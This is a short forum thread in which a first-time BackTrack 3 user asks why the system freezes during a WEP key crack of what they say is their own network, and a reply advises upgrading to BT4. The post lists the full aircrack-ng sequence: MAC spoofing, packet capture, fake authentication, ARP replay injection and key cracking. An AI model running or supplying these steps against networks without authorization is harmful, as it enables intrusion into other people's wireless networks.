BackTrack Freezes when trying to read/write Packets

I am trying to crack my own Network's WEP key but I am having a problem. I do all of the following steps:

1- airmon-ng
2- airmon-ng stop (interface)
3- ifconfig (interface) down
4- macchanger --mac 00:11:22:33:44:55 (interface)
5- airmon-ng start (interface)
6- airodump-ng (interface)
7- airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
8- aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
9- aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
10- aircrack-ng -b (bssid) (file name-01.cap)

On step #9 is where backtrack freezes. It starts to read/write like 15-20 packets but then it freezes and I can't do nothing except to force shutdown my computer. Today is my first day using backtrack. I am running it from a USB flash drive, Backtrack 3.

Upgrade to BT 4 Final.
We don't support BT3.
Also next time more info on your setup may be of help.
